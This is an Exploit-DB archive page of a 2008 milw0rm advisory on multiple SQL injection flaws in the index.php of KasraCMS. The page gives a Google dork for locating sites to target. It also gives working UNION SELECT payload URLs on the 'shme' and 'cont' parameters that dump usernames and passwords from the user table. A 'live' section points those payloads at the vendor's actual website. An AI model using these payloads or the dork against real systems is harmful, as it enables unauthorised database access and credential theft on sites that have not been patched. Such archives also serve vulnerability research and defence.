Kasra CMS - 'index.php' Multiple SQL Injections

EDB-ID:

6837

CVE:

EDB Verified:

Author:

G4N0K

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2008-10-25

Vulnerable App:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
KasraCMS (index.php) Multiple Remote SQL Injection Vulnerabilities
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[~] Script: KasraCMS
[~] Language : PHP
[~] WebSite: http://kasracms.com
[~] affected File: index.php
[~] Type : Commercial
[~] Report-Date : 25/10/2008


--[ DoRK ]--
intext:"2007-2008 Kasra ICT"


--[ Founder ]--
G4N0K <mail.ganok[at]gmail.com>


--[ Exploit ]--
[~] http://localhost/[path]/index.php?shme=-63 UNION ALL SELECT
0,0,concat(username,0x3a,password),0,0,0,0,0 FROM user--
[~] http://localhost/[path]/index.php?cont=-63 UNION ALL SELECT
0,0,0,concat(username,0x3a,password),0,0,0,0 FROM user--


--[ L!ve ]--
http://kasracms.com/index.php?cont=-63 UNION ALL SELECT
0,0,0,concat(username,0x3a,password),0,0,0,0 FROM user--
http://kasracms.com/index.php?shme=-63 UNION ALL SELECT
0,0,concat(username,0x3a,password),0,0,0,0,0 FROM user--


--[ Greetz ]--
[~] ALLAH
[~] Tornado2800 <Tornado2800[at]gmail.com>
[~] Hussain-X <darkangel_g85[at]yahoo.com>

//ALLAH, forgimme...

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
EoX
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# milw0rm.com [2008-10-25]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services